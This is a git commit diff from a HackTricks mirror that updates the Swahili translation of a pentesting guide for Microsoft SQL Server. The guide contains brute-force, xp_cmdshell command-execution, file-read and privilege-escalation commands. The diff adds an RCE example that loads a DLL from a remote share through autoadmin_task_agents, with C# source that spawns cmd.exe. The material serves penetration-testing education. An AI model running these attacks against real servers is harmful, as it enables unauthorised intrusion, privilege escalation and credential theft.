Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

Browse source
This commit is contained in:
Translator 2024-11-22 11:21:00 +00:00
parent 141acc4f39
commit cee35ff114
1 changed files with 96 additions and 36 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

132
network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View file

@ -1,15 +1,15 @@
# 1433 - Pentesting MSSQL - Microsoft SQL Server
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
@ -17,7 +17,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## Basic Information
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
> **Microsoft SQL Server** ni **mfumo wa usimamizi wa hifadhidata** wa uhusiano ulioendelezwa na Microsoft. Kama seva ya hifadhidata, ni bidhaa ya programu yenye kazi kuu ya kuhifadhi na kupata data kama inavyohitajika na programu nyingine za programu—ambazo zinaweza kukimbia kwenye kompyuta hiyo hiyo au kwenye kompyuta nyingine kupitia mtandao (ikiwemo Intaneti).\\
@ -29,8 +29,8 @@ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
* **master Database**: Hii database ni muhimu kwani inachukua maelezo yote ya kiwango cha mfumo kwa mfano wa SQL Server.
* **msdb Database**: SQL Server Agent inatumia hii database kusimamia ratiba za arifa na kazi.
* **model Database**: Inatumika kama mpango wa kila database mpya kwenye mfano wa SQL Server, ambapo mabadiliko yoyote kama ukubwa, collation, mfano wa urejeleaji, na mengineyo yanaakisiwa katika databases mpya zinazoundwa.
* **Resource Database**: Hii ni database ya kusoma tu ambayo ina vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vinahifadhiwa kimwili katika database ya Resource, vinawasilishwa kimaadili katika schema ya sys ya kila database.
* **model Database**: Inatumika kama mfano kwa kila database mpya kwenye mfano wa SQL Server, ambapo mabadiliko yoyote kama ukubwa, collation, mfano wa urejeleaji, na mengineyo yanaakisiwa katika databases mpya zinazoundwa.
* **Resource Database**: Database isiyo na uwezo wa kuandikwa ambayo ina vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vinahifadhiwa kimwili katika database ya Resource, vinawasilishwa kimaadili katika schema ya sys ya kila database.
* **tempdb Database**: Inatumika kama eneo la kuhifadhi la muda kwa vitu vya muda au seti za matokeo za kati.
## Enumeration
@ -43,10 +43,10 @@ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
Ikiwa **huna** **vithibitisho** unaweza kujaribu kuvihisi. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza **kufunga akaunti** ikiwa unashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.
Ikiwa **huna** **akikazi** unaweza kujaribu kuyakisia. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza **kufunga akaunti** ikiwa unashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.
{% endhint %}
#### Metasploit (inahitaji vithibitisho)
#### Metasploit (inahitaji akiba)
```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
@ -80,11 +80,10 @@ msf> use windows/manage/mssql_local_auth_bypass
```
### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server)
### Uhesabu wa Mikono
### Uhesabuaji wa Mikono
#### Ingia
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
@ -171,13 +170,13 @@ SELECT * FROM sysusers
#### Pata Ruhusa
1. **Securable:** Imefafanuliwa kama rasilimali zinazodhibitiwa na SQL Server kwa udhibiti wa ufikiaji. Hizi zimeainishwa katika:
* **Server** Mifano ni pamoja na databases, logins, endpoints, availability groups, na server roles.
* **Database** Mifano inajumuisha database role, application roles, schema, certificates, full text catalogs, na watumiaji.
* **Schema** Inajumuisha tables, views, procedures, functions, synonyms, nk.
2. **Permission:** Inahusishwa na SQL Server securables, ruhusa kama ALTER, CONTROL, na CREATE zinaweza kutolewa kwa principal. Usimamizi wa ruhusa unafanyika katika ngazi mbili:
* **Server** Mifano ni pamoja na databases, logins, endpoints, makundi ya upatikanaji, na majukumu ya server.
* **Database** Mifano inajumuisha jukumu la database, majukumu ya programu, schema, vyeti, katalogi za maandiko kamili, na watumiaji.
* **Schema** Inajumuisha meza, maoni, taratibu, kazi, majina sawa, n.k.
2. **Permission:** Inahusishwa na securables za SQL Server, ruhusa kama ALTER, CONTROL, na CREATE zinaweza kutolewa kwa principal. Usimamizi wa ruhusa unafanyika katika ngazi mbili:
* **Server Level** kwa kutumia logins
* **Database Level** kwa kutumia watumiaji
3. **Principal:** Neno hili linarejelea chombo ambacho kinapewa ruhusa kwa securable. Principals hasa ni pamoja na logins na watumiaji wa database. Udhibiti wa ufikiaji kwa securables unatekelezwa kupitia utoaji au kukataa ruhusa au kwa kujumuisha logins na watumiaji katika roles zilizo na haki za ufikiaji.
3. **Principal:** Neno hili linarejelea chombo ambacho kinapewa ruhusa kwa securable. Principals hasa ni pamoja na logins na watumiaji wa database. Udhibiti wa ufikiaji kwa securables unatekelezwa kupitia utoaji au kukataa ruhusa au kwa kujumuisha logins na watumiaji katika majukumu yaliyo na haki za ufikiaji.
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
@ -202,7 +201,7 @@ EXEC sp_helprotect 'xp_cmdshell'
### Execute OS Commands
{% hint style="danger" %}
Kumbuka kwamba ili uweze kutekeleza amri si tu inahitajika kuwa na **`xp_cmdshell`** **imewezeshwa**, bali pia kuwa na **ruhusa ya EXECUTE kwenye utaratibu wa kuhifadhi `xp_cmdshell`**. Unaweza kupata nani (isipokuwa sysadmins) anaweza kutumia **`xp_cmdshell`** kwa:
Kumbuka kwamba ili uweze kutekeleza amri si tu inahitajika kuwa na **`xp_cmdshell`** **imewezeshwa**, bali pia kuwa na **idhini ya EXECUTE kwenye utaratibu wa kuhifadhi `xp_cmdshell`**. Unaweza kupata nani (isipokuwa sysadmins) anaweza kutumia **`xp_cmdshell`** kwa:
```sql
Use master
EXEC sp_helprotect 'xp_cmdshell'
@ -321,7 +320,7 @@ EXECUTE sp_OADestroy @OLE
```
### **Soma faili na** OPENROWSET
Kwa default, `MSSQL` inaruhusu kusoma faili **katika faili yoyote kwenye mfumo wa uendeshaji ambayo akaunti ina ruhusa ya kusoma**. Tunaweza kutumia swali la SQL lifuatalo:
Kwa default, `MSSQL` inaruhusu kusoma faili **katika faili yoyote kwenye mfumo wa uendeshaji ambayo akaunti ina ruhusa ya kusoma**. Tunaweza kutumia query ya SQL ifuatayo:
```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
@ -381,23 +380,83 @@ Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
```
For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
Kwa **mfano zaidi** angalia [**chanzo asilia**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
### RCE with MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
### RCE na MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
Ni **uwezekano wa kupakia .NET dll ndani ya MSSQL kwa kutumia kazi za kawaida**. Hata hivyo, **inahitaji `dbo` ufikiaji** hivyo unahitaji muunganisho na database **kama `sa` au jukumu la Msimamizi**.
Inawezekana **kuchaji .NET dll ndani ya MSSQL kwa kutumia kazi za kawaida**. Hata hivyo, **hii inahitaji `dbo` ufikiaji** hivyo unahitaji muunganisho na database **kama `sa` au jukumu la Msimamizi**.
[**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example.
[**Fuata kiungo hiki**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) kuona mfano.
### Other ways for RCE
### RCE na `autoadmin_task_agents`
Kulingana[ **na chapisho hili**](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp), pia inawezekana kuchaji dll ya mbali na kufanya MSSQL iite kwa kutumia kitu kama:
{% code overflow="wrap" %}
```sql
update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";
```
{% endcode %}
Pamoja na:
```csharp
using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;
namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c ping localhost -t";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
process.WaitForExit();
}
public override void DoWork()
{
}
public override void ExternalJob(string command, LogBaseService jobLogger)
{
}
public override void Start(IServicesFactory services)
{
}
public override void Stop()
{
}
public void Test()
{
}
}
}
```
### Njia Nyingine za RCE
Kuna njia nyingine za kupata utekelezaji wa amri, kama kuongeza [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), na [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
## MSSQL Privilege Escalation
## Kuinua Haki za MSSQL
### From db\_owner to sysadmin
### Kutoka db\_owner hadi sysadmin
Ikiwa **mtumiaji wa kawaida** amepewa jukumu **`db_owner`** juu ya **database inayomilikiwa na mtumiaji wa admin** (kama **`sa`**) na database hiyo imewekwa kama **`trustworthy`**, mtumiaji huyo anaweza kutumia haki hizi kwa **privesc** kwa sababu **stored procedures** zilizoundwa huko zinaweza **kutekelezwa** kama mmiliki (**admin**).
Ikiwa **mtumiaji wa kawaida** amepewa jukumu la **`db_owner`** juu ya **database inayomilikiwa na mtumiaji wa admin** (kama **`sa`**) na database hiyo imewekwa kama **`trustworthy`**, mtumiaji huyo anaweza kutumia haki hizi vibaya ili **privesc** kwa sababu **stored procedures** zilizoundwa huko zinaweza **kutekelezwa** kama mmiliki (**admin**).
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
@ -443,7 +502,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
```
### Uwakilishi wa watumiaji wengine
SQL Server ina ruhusa maalum, inayoitwa **`IMPERSONATE`**, ambayo **inawaruhusu watumiaji wanaotekeleza kuchukua ruhusa za mtumiaji mwingine** au kuingia hadi muktadha urejelewe au kikao kikome.
SQL Server ina ruhusa maalum, inayoitwa **`IMPERSONATE`**, ambayo **inawaruhusu mtumiaji anayetekeleza kuchukua ruhusa za mtumiaji mwingine** au kuingia hadi muktadha urejelewe au kikao kikome.
```sql
# Find users you can impersonate
SELECT distinct b.name
@ -467,7 +526,7 @@ use_link [NAME]
Ikiwa unaweza kujifanya kuwa mtumiaji, hata kama si sysadmin, unapaswa kuangalia i**f the user has access** kwa **databases** nyingine au seva zilizounganishwa.
{% endhint %}
Kumbuka kwamba mara tu unapo kuwa sysadmin unaweza kujifanya kuwa mtu mwingine yeyote:
Kumbuka kwamba mara tu unapo kuwa sysadmin unaweza kujifanya kuwa yeyote mwingine:
```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
@ -481,7 +540,7 @@ Unaweza kufanya shambulio hili kwa kutumia moduli ya **metasploit**:
```bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
```
au kwa kutumia **PS** script:
au kwa script ya **PS**:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
@ -493,14 +552,14 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
## Kutolewa kwa nywila kutoka kwa SQL Server Linked Servers
Mshambuliaji anaweza kutoa nywila za SQL Server Linked Servers kutoka kwa SQL Instances na kuzipata kwa maandiko wazi, akimpa mshambuliaji nywila ambazo zinaweza kutumika kupata msingi mkubwa zaidi kwenye lengo. Skripti ya kutoa na kufichua nywila zilizohifadhiwa kwa Linked Servers inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)
Mshambuliaji anaweza kutoa nywila za SQL Server Linked Servers kutoka kwa SQL Instances na kuzipata kwa maandiko wazi, akimpa mshambuliaji nywila ambazo zinaweza kutumika kupata ushawishi mkubwa zaidi kwenye lengo. Skripti ya kutoa na kufichua nywila zilizohifadhiwa kwa Linked Servers inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract_linked_server_passwords)
Baadhi ya mahitaji, na usanidi lazima yafanyike ili exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na haki za Administrator kwenye mashine, au uwezo wa kusimamia Usanidi wa SQL Server.
Baadhi ya mahitaji, na usanidi lazima yafanywe ili exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na haki za Administrator kwenye mashine, au uwezo wa kusimamia Usanidi wa SQL Server.
Baada ya kuthibitisha ruhusa zako, unahitaji kusanidi mambo matatu, ambayo ni yafuatayo:
1. Wezesha TCP/IP kwenye SQL Server instances;
2. Ongeza parameter ya Kuanzisha, katika kesi hii, bendera ya trace itaongezwa, ambayo ni -T7806.
2. Ongeza parameter ya Kuanzisha, katika kesi hii, bendera ya kufuatilia itaongezwa, ambayo ni -T7806.
3. Wezesha muunganisho wa usimamizi wa mbali.
Ili kujiandaa kwa usanidi huu, [hii hazina](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) ina skripti zinazohitajika. Mbali na kuwa na skripti ya powershell kwa kila hatua ya usanidi, hazina pia ina skripti kamili ambayo inachanganya skripti za usanidi na utoaji na ufichuzi wa nywila.
@ -511,8 +570,8 @@ Kwa maelezo zaidi, rejelea viungo vifuatavyo kuhusu shambulio hili: [Kufichua Ny
## Kuinua Haki za Mlokole
Mtumiaji anayekimbia MSSQL server atakuwa amewezesha token ya haki **SeImpersonatePrivilege.**\
Huenda ukawa na uwezo wa **kuinua hadi kwa Msimamizi** ukifuatia moja ya hizi kurasa 2:
Mtumiaji anayekimbia MSSQL server atakuwa amewezesha tokeni ya haki **SeImpersonatePrivilege.**\
Huenda ukawa na uwezo wa **kuinua hadi kwa Administrator** ukifuatia moja ya hizi kurasa 2:
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
@ -536,6 +595,7 @@ Huenda ukawa na uwezo wa **kuinua hadi kwa Msimamizi** ukifuatia moja ya hizi ku
* [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
* [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
* [https://exploit7-tr.translate.goog/posts/sqlserver/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=en&\_x\_tr\_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
## HackTricks Amri za Otomatiki
```
@ -594,15 +654,15 @@ Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {I
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>